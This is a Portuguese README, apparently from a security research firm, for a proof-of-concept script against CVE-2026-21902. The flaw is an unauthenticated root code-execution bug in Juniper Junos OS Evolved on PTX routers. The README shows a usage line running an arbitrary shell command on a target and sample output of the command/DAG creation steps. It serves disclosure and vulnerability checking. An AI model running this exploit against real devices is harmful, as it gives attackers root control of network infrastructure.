
Gera artefatos de detecção para CVE-2026-21902 no Juniper Junos Evolved, permitindo a verificação de execução remota de código não autenticada via criação de comandos e DAG.
Gerador de Artefactos de Deteção para Juniper Junos Evolved CVE-2026-21902.
https://github.com/user-attachments/assets/a7d667e1-7636-4097-ab3f-838944cdcccc
Consulte a nossa publicação no blog para detalhes técnicos.
python .\watchTowr-vs-JunosEvolved-CVE-2026-21902.py 127.0.0.1 -c "id > /var/home/admin/watchTowr.txt"
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-JunosEvolved-CVE-2026-21902.py
(*) Gerador de Artefactos de Deteção de Execução Remota de Código Não Autenticada no Juniper JunosEvolved
- McCaulay (@_mccaulay) of watchTowr (@watchTowrcyber)
CVEs: [CVE-2026-21902]
[+] COMMAND cmd1 created
[+] DAG dag1 created
[+] DAG INSTANCE instance1 created
[+] Config committed...
[#] Waiting for command execution...
[+] Command executed, check the target for results!
Este script tenta detetar se o Junos Evolved OS e a série PTX são vulneráveis ao CVE-2026-21902.
Este problema afeta o Junos OS Evolved na série PTX:
Este problema não afeta versões do Junos OS Evolved anteriores à 25.4R1-EVO.
Este problema não afeta o Junos OS.
Para mais informações, leia o comunicado Junos OS Evolved: PTX Series: uma vulnerabilidade permite que um atacante não autenticado baseado em rede execute código como root.
Para as pesquisas de segurança mais recentes, siga a equipa do watchTowr Labs